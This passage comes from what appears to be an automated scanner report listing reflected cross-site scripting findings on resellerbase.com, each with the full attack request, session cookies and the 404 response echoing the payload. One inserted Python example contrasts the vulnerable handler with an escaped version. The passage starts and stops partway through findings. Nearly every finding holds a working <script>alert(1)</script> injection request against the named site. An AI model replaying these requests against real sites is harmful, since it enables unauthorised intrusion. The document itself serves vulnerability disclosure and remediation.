<p>The requested URL /detail27912<script>alert(1)</script>7953fd773b9/4/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2807. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5945c<script>alert(1)</script>6d45da52530 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/45945c<script>alert(1)</script>6d45da52530/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/45945c<script>alert(1)</script>6d45da52530/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2808. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dbe7c<script>alert(1)</script>094cd37627f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themesdbe7c<script>alert(1)</script>094cd37627f/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themesdbe7c<script>alert(1)</script>094cd37627f/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2809. http://www.resellerbase.com/detail/4/themes/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cde87<script>alert(1)</script>277a7e581e7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/search.phpcde87<script>alert(1)</script>277a7e581e7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.phpcde87<script>alert(1)</script>277a7e581e7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2810. http://www.resellerbase.com/detail/4/themes/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 2e084<a>f2c8814586e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search2e084<a>f2c8814586e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...&Submit3=Search2e084<a>f2c8814586e&opt=2 was not found on this server.</p>
...[SNIP]...

2.2811. http://www.resellerbase.com/detail/4/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a1d46<a>4a4949183b7 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/search.php?keyword=search...a1d46<a>4a4949183b7&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...a1d46<a>4a4949183b7&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2812. http://www.resellerbase.com/detail/4/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 33e39<script>alert(1)</script>0c38dfab204 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2&33e39<script>alert(1)</script>0c38dfab204=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2&33e39<script>alert(1)</script>0c38dfab204=1 was not found on this server.</p>
...[SNIP]...

2.2813. http://www.resellerbase.com/detail/4/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/4/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ea70f<a>60923432601 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2ea70f<a>60923432601 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4/themes/search.php?keyword=search...&Submit3=Search&opt=2ea70f<a>60923432601 was not found on this server.</p>
...[SNIP]...

2.2814. http://www.resellerbase.com/detail/40/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 56b5e<script>alert(1)</script>12c90c48908 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail56b5e<script>alert(1)</script>12c90c48908/40/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail56b5e<script>alert(1)</script>12c90c48908/40/ was not found on this server.</p>
...[SNIP]...

2.2815. http://www.resellerbase.com/detail/40/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5e539<script>alert(1)</script>3b85b19cf7c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/405e539<script>alert(1)</script>3b85b19cf7c/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/405e539<script>alert(1)</script>3b85b19cf7c/ was not found on this server.</p>
...[SNIP]...

2.2816. http://www.resellerbase.com/detail/40/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3d9e2<script>alert(1)</script>5b8bbfaa25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/?3d9e2<script>alert(1)</script>5b8bbfaa25=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/?3d9e2<script>alert(1)</script>5b8bbfaa25=1 was not found on this server.</p>
...[SNIP]...

2.2817. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 827ed<script>alert(1)</script>fac82712a5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail827ed<script>alert(1)</script>fac82712a5e/40/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail827ed<script>alert(1)</script>fac82712a5e/40/rating.php was not found on this server.</p>
...[SNIP]...

2.2818. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload da45b<script>alert(1)</script>bc6fb96243eb7c4e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailda45b<script>alert(1)</script>bc6fb96243eb7c4e6/40/rating.php?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailda45b<script>alert(1)</script>bc6fb96243eb7c4e6/40/rating.php?id=40&rating=5 was not found on this server.</p>
...[SNIP]...
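The two handlers below are an added example, not code from the report or from the resellerbase.com application, whose server-side source is not shown. They model the sink visible in every response in this section: a custom 404 page that prints the requested URL verbatim between <p> tags. vulnerable_404 reproduces that behaviour; hardened_404 entity-encodes the URL before placing it in the page and pins the charset. The WSGI framing, the render driver and the environ values are assumptions made so the example runs offline; the canary is the one from the request above.

```python
from html import escape

# Canary copied from the request above; the random-looking prefix and suffix
# let the tester locate the reflection in the response.
PAYLOAD = "da45b<script>alert(1)</script>bc6fb96243eb7c4e6"


def _not_found_page(shown_url: str) -> bytes:
    # Skeleton modelled on the 404 page quoted in the report.
    return (
        "<!DOCTYPE html><html><head><title>Error 404 - Page Not Found</title></head>"
        "<body><p>The requested URL " + shown_url
        + " was not found on this server.</p></body></html>"
    ).encode("utf-8")


def _requested_url(environ) -> str:
    # Rebuild the request target from the (assumed) WSGI environ.
    uri = environ.get("PATH_INFO", "/")
    if environ.get("QUERY_STRING"):
        uri += "?" + environ["QUERY_STRING"]
    return uri


def vulnerable_404(environ, start_response):
    """Copies the requested URL into the page unmodified: the reflected XSS sink."""
    body = _not_found_page(_requested_url(environ))
    start_response("404 Not Found", [("Content-Type", "text/html")])
    return [body]


def hardened_404(environ, start_response):
    """Same page; the attacker-controlled URL is entity-encoded for a text
    context, and the charset is pinned so the browser cannot reinterpret it."""
    body = _not_found_page(escape(_requested_url(environ), quote=True))
    start_response("404 Not Found", [("Content-Type", "text/html; charset=utf-8"),
                                     ("X-Content-Type-Options", "nosniff")])
    return [body]


def render(app, path: str, query: str = ""):
    """Drive a WSGI app with a constructed environ; return (status, body)."""
    captured = {}

    def start_response(status, headers, exc_info=None):
        captured["status"] = status

    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path, "QUERY_STRING": query}
    body = b"".join(app(environ, start_response)).decode("utf-8")
    return captured["status"], body


def reflects_script(body: str) -> bool:
    """True when the canary's <script> element survives unencoded in the HTML."""
    return "<script>alert(1)</script>" in body


if __name__ == "__main__":
    path = "/detail" + PAYLOAD + "/40/rating.php"
    for app in (vulnerable_404, hardened_404):
        status, body = render(app, path, "id=40&rating=5")
        print(app.__name__, status, "script reflected:", reflects_script(body))
```

Running the block prints one line per handler: the vulnerable page reflects the script element, the hardened one does not. Escaping at the point where the URL is written into the page, rather than filtering the input, is what closes every variant listed for this host, since they all share the one sink.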

2.2819. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7f624<script>alert(1)</script>d6d80fa3ca1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/407f624<script>alert(1)</script>d6d80fa3ca1/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/407f624<script>alert(1)</script>d6d80fa3ca1/rating.php was not found on this server.</p>
...[SNIP]...

2.2820. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fea98<script>alert(1)</script>124a6410c066aefce was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/40fea98<script>alert(1)</script>124a6410c066aefce/rating.php?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40fea98<script>alert(1)</script>124a6410c066aefce/rating.php?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2821. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload af035<script>alert(1)</script>4d753b5d2baaf3459 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/40/rating.phpaf035<script>alert(1)</script>4d753b5d2baaf3459?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.phpaf035<script>alert(1)</script>4d753b5d2baaf3459?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2822. http://www.resellerbase.com/detail/40/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 71d7f<script>alert(1)</script>193216f85cd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/rating.php71d7f<script>alert(1)</script>193216f85cd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.php71d7f<script>alert(1)</script>193216f85cd was not found on this server.</p>
...[SNIP]...

2.2823. http://www.resellerbase.com/detail/40/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 70629<script>alert(1)</script>83a53162f2251462f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/40/rating.php/70629<script>alert(1)</script>83a53162f2251462f?id=40&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/rating.php/70629<script>alert(1)</script>83a53162f2251462f?id=40&rating=5 was not found on this server.</p>
...[SNIP]...

2.2824. http://www.resellerbase.com/detail/40/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/rating.php

Issue detail

